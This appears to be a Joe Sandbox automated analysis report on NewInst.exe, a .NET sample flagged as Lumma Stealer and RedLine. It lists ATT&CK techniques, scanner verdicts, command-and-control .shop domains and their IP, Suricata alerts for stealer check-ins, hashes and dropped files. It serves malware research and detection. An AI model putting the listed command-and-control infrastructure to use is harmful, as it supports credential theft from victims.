Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	41 Virtualization/Sandbox Evasion	Security Account Manager	22 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	411 Process Injection	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
NewInst.exe	53%	ReversingLabs	ByteCode-MSIL.Ransomware.RedLine
NewInst.exe	100%	Avira	HEUR/AGEN.1352702
NewInst.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://upx.sf.net	0%	URL Reputation	safe
evoliutwoqm.shop	0%	Avira URL Cloud	safe
millyscroqwp.shop	100%	Avira URL Cloud	malware
stamppreewntnq.shop	100%	Avira URL Cloud	phishing
condedqpwqm.shop	100%	Avira URL Cloud	phishing
https://froytnewqowv.shop/	100%	Avira URL Cloud	phishing
https://froytnewqowv.shop/apiv	100%	Avira URL Cloud	phishing
caffegclasiqwp.shop	100%	Avira URL Cloud	malware
froytnewqowv.shop	100%	Avira URL Cloud	phishing
https://froytnewqowv.shop/api	100%	Avira URL Cloud	malware
locatedblsoqp.shop	100%	Avira URL Cloud	phishing
stagedchheiqwo.shop	100%	Avira URL Cloud	phishing
traineiwnqo.shop	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
froytnewqowv.shop	188.114.97.3	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://froytnewqowv.shop/api	true	Avira URL Cloud: malware	unknown
froytnewqowv.shop	true	Avira URL Cloud: phishing	unknown
stamppreewntnq.shop	true	Avira URL Cloud: phishing	unknown
condedqpwqm.shop	true	Avira URL Cloud: phishing	unknown
evoliutwoqm.shop	true	Avira URL Cloud: safe	unknown
locatedblsoqp.shop	true	Avira URL Cloud: phishing	unknown
caffegclasiqwp.shop	true	Avira URL Cloud: malware	unknown
millyscroqwp.shop	true	Avira URL Cloud: malware	unknown
stagedchheiqwo.shop	true	Avira URL Cloud: phishing	unknown
traineiwnqo.shop	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://froytnewqowv.shop/	RegAsm.exe, 00000002.00000002.1940966413.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://upx.sf.net	Amcache.hve.5.dr	false	URL Reputation: safe	unknown
https://froytnewqowv.shop/apiv	RegAsm.exe, 00000002.00000002.1940966413.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.97.3	froytnewqowv.shop	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1501436
Start date and time:	2024-08-29 22:58:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	NewInst.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@5/6@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 15 Number of non-executed functions: 49
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92
Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: NewInst.exe

Simulations

Behavior and APIs

Time	Type	Description
16:58:58	API Interceptor	1x Sleep call for process: RegAsm.exe modified
16:59:24	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	Izvod racuna u prilogu.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.coinwab.com/kqqj/
	file.exe	Get hash	malicious	LummaC	Browse	joxi.net/4Ak49WQH0GE3Nr.mp3
	Document_pdf.exe	Get hash	malicious	FormBook	Browse	www.x0x9x8x8x7x6.shop/dscg/
	QUOTATION_AUGQTRA071244#U00b7PDF.scr	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/zbi9vNYx/download
	z1209627360293827.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.coinwab.com/kqqj/
	file.exe	Get hash	malicious	LummaC	Browse	joxi.net/4Ak49WQH0GE3Nr.mp3
	Rudvfa0Z17.exe	Get hash	malicious	Nitol	Browse	web.ad87h92j.com/4/t.bmp
	nOyswc9ly2.dll	Get hash	malicious	Unknown	Browse	web.ad87h92j.com/4/t.bmp
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/0U9QqTZ6/download
	QUOTATION_AUGQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	filetransfer.io/data-package/e0pM9Trc/download

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
froytnewqowv.shop	1YC268KfwD.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
froytnewqowv.shop	PqyFc2vziL.exe	Get hash	malicious	LummaC	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	4QihT6CwD8.exe	Get hash	malicious	Azorult	Browse	104.21.2.6
	https://5kirp.mellifluous5.com/5kiRp/	Get hash	malicious	HTMLPhisher	Browse	172.66.0.227
	https://autode.sk/4g6XSl8&c=E,1,I0OgoTIAL6zcaU4kgbWKwMGE3oDCv6iOL9CcUXdPtaitrRYDaY2yqyg5z3Y_ue3psEsBTb_33PlDmEStP6z69HizNf2ISciGwmDuh9q-ApyQjjb2ectuilD2Rn0,&typo=1	Get hash	malicious	Unknown	Browse	104.17.246.203
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	rPEDIDO.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	COTIZACION 280824.exe	Get hash	malicious	FormBook	Browse	104.21.10.159

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	rBslc_Pymt-Hs.exe	Get hash	malicious	Remcos, DBatLoader	Browse	188.114.97.3
	Izvod racuna u prilogu.exe	Get hash	malicious	DBatLoader, FormBook	Browse	188.114.97.3
	Z66MsXpleT.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.97.3
	66cf818156193_ldjfnsfd.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	0VCartoonizer_Trial.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	eSLlhErJ0q.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.97.3

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegAsm.exe_bc4a4c4fb437bcca3219060cc715fc13afa711_8c6fa16e_977c0c66-5e8a-41e9-a4c3-85b89f066d6a\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0833266034729874
Encrypted:	false
SSDEEP:	192:ClBeFy/b++0Nvw4MjezEKJAazuiFFZ24IO8Z:Efb+lNvw5jenAazuiFFY4IO8Z
MD5:	12A50D0ABF0F015D76E6775394DB8DD3
SHA1:	1C1031EAA3FA57BA0D875932B96495F46A6CB3ED
SHA-256:	0E038DB36B41F6E9469097B65D824AE08E7005DDE0FE20DFABD5E9461D10E911
SHA-512:	2AA16F9E121BE4CCC036F8416DE0BC2C8C15A0593D72B76D0D9FECC9B1346564697377977FC6F9AC70062099E565384C9C93FF5FDF1CB6DA93173B92FCB2B826
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.4.3.8.7.4.0.3.6.0.4.8.0.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.4.3.8.7.4.0.8.6.0.4.8.5.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.7.7.c.0.c.6.6.-.5.e.8.a.-.4.1.e.9.-.a.4.c.3.-.8.5.b.8.9.f.0.6.6.d.6.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.a.4.b.7.7.c.7.-.a.d.d.3.-.4.e.2.a.-.8.f.4.a.-.c.8.b.a.6.3.6.3.4.6.d.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.A.s.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.A.s.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.d.8.-.0.0.0.1.-.0.0.1.4.-.2.c.d.1.-.6.1.4.4.5.6.f.a.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.3.0.a.b.5.5.5.9.e.8.0.6.5.7.4.d.2.6.b.4.c.2.0.8.4.7.c.3.6.8.e.d.5.5.4.8.3.b.0.!.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC0.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6298
Entropy (8bit):	3.71955395050752
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbAeM6oFYwJ1QQwIMK5aM4UqF89bTYSsfCRm:R6l7wVeJDM6IYwJWQJprc89bTfsfCRm
MD5:	B398CB994A5C467C5A8C9FFE9D9A7792
SHA1:	72F193FC0A3215B3E974E6F642F9D28305DC4463
SHA-256:	FB26C97CE809889E7956F83B8E1645314D0BD653F956ED237497880A11D3AA2B
SHA-512:	53624A69299E3E32EEE4BD59408CCC591DF2C7CC185163C77717B829A07E2ED00270ACECC9A0F8F2E4693C8BA4EB14D017FD1C179D345CB5DA4AE3D80554793B
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.4.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE0.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4636
Entropy (8bit):	4.445112467314755
Encrypted:	false
SSDEEP:	48:cvIwWl8zs4Jg77aI9cfWpW8VYiYm8M4JfuNnFY+q8oWSQgLuOLuerd:uIjf+I7qO7VmJfuIvpBukuerd
MD5:	802DE9770E79E58620A0C2227EF229FF
SHA1:	0357F321228666B5E0B6BE89184B4D00099DB471
SHA-256:	83F0FE6FD627DA5046ABAB22AA4E4E93F6A652EE27BD07E00A72FADA8C6FC23D
SHA-512:	BB2B445459ED559F1B614578C31FBEADD8AD024057A329F341F624B02BBB320425B2DDB8355B7AEEC88D149584E191074EE16FAC4BBDDDC7CF6DD73C114CDD2E
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="477361" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFF87.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Aug 29 20:59:00 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	106708
Entropy (8bit):	2.056367481976088
Encrypted:	false
SSDEEP:	384:RitmSzU8hb5Hn3YSPONVYDgYa/hjCT6F21qYq+JKVdiRcy/Ng7OcNpyAy4C:7bS5n3rDG/U621giIoAy1
MD5:	99CF8E60586850745CDF7A471DA87BB5
SHA1:	9B4D81D22415D972C9FA84EB363FB46FD61DF92E
SHA-256:	42173BA54167080EAC225BEB3FC101717F82CEB1864B229C8501BFCD2A01F139
SHA-512:	591E1676AECB8FBDBE9B0153EA6CCFCC130144DDC39EA38506215C251AAA3CA77FF5C1CAE2C0F4188389536C4A4D27D2ED052ABE2261D30E7BEF21474C611DBA
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ..........f........................H...........<....$...........H..........`.......8...........T...........0D...\...........%...........'..............................................................................eJ.......'......GenuineIntel............T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NewInst.exe.log

Download File

Process:	C:\Users\user\Desktop\NewInst.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.4663366639127835
Encrypted:	false
SSDEEP:	6144:FIXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uNmdwBCswSb+:mXD94zWlLZMM6YFH8++
MD5:	61BFE6FDCA5FF09E0ACA99F2D41E1923
SHA1:	E7BFC1B41E0FFA431993D0ECB6A41043D2C23538
SHA-256:	86792A8C16704A37E4887DFFD9C472D8D32029216FC57CA85BEE843A57A978DD
SHA-512:	CC9A82AE47C59FE4699F99A6ABB00E3F6EF8A27657FB19031BEA8B86603BF359385BF95B5937E6FBB7D84119F372CDF51786210B60DF6ED13A7B9793DE576A06
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.v.EV..................................................................................................................................................................................................................................................................................................................................................q........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.9844876919999646
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	NewInst.exe
File size:	283'648 bytes
MD5:	c2e7e93d02fa7cba953e3dd4463ba91b
SHA1:	ff908dd3556d49e45b2ef917f441a0035ac5aa97
SHA256:	4e62b2ec1f99fbfaab9b6a9253da40e00d4e5bf9cbecb29e6e77284af424d0d8
SHA512:	5b6032cfb3301e4aea7b5d2ee2b3c2474e9bb8a37a250359cdcc4c122deb7208fb9f5479afbdc3bb562832737f390fe59b434823cfac9afb949b52dbea43c350
SSDEEP:	6144:W9MGS9lvYrQ4ShmWBl4ei3oY6ASC/5LQsmA9sWLnQFWTM/mlZHf2fdp18y:ml+vfTByei3b6A1QhAycTcvj18y
TLSH:	38542323A3A9CCE4F522AA78DC92A1691F1DD375B5490F533C28D1736C1BB3362D7618
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....,.f.................L..........^j... ........@.. ..............................K.....`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x446a5e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66CF2CBA [Wed Aug 28 13:57:14 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x46a08	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x48000	0x242	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x468d0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x44a64	0x44c00	b16d235c4e2a6dc5caa62a1c4beddee2	False	0.9917862215909091	data	7.992976484719213	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x48000	0x242	0x400	f0aba3589f3966f42ae31db57f2dbae6	False	0.302734375	data	3.5235960918606954	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x4a000	0xc	0x200	259ae62d1919b28ac9565f5955d0011b	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x48058	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-29T22:59:00.462756+0200	TCP	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	49731	443	192.168.2.4	188.114.97.3
2024-08-29T22:59:00.462756+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49731	443	192.168.2.4	188.114.97.3
2024-08-29T22:58:58.728283+0200	UDP	2055478	ET MALWARE Lumma Stealer Domain in DNS Lookup (froytnewqowv .shop)	1	49543	53	192.168.2.4	1.1.1.1
2024-08-29T22:58:59.391011+0200	TCP	2049836	ET MALWARE Lumma Stealer Related Activity	1	49730	443	192.168.2.4	188.114.97.3
2024-08-29T22:58:59.391011+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49730	443	192.168.2.4	188.114.97.3
2024-08-29T22:58:59.995093+0200	TCP	2055488	ET MALWARE Lumma Stealer Domain in TLS SNI (froytnewqowv .shop)	1	49731	443	192.168.2.4	188.114.97.3
2024-08-29T22:58:59.226042+0200	TCP	2055488	ET MALWARE Lumma Stealer Domain in TLS SNI (froytnewqowv .shop)	1	49730	443	192.168.2.4	188.114.97.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 29, 2024 22:58:58.744757891 CEST	49730	443	192.168.2.4	188.114.97.3
Aug 29, 2024 22:58:58.744792938 CEST	443	49730	188.114.97.3	192.168.2.4
Aug 29, 2024 22:58:58.744995117 CEST	49730	443	192.168.2.4	188.114.97.3
Aug 29, 2024 22:58:58.748029947 CEST	49730	443	192.168.2.4	188.114.97.3
Aug 29, 2024 22:58:58.748047113 CEST	443	49730	188.114.97.3	192.168.2.4
Aug 29, 2024 22:58:59.225883007 CEST	443	49730	188.114.97.3	192.168.2.4
Aug 29, 2024 22:58:59.226042032 CEST	49730	443	192.168.2.4	188.114.97.3
Aug 29, 2024 22:58:59.242820024 CEST	49730	443	192.168.2.4	188.114.97.3
Aug 29, 2024 22:58:59.242836952 CEST	443	49730	188.114.97.3	192.168.2.4
Aug 29, 2024 22:58:59.243735075 CEST	443	49730	188.114.97.3	192.168.2.4
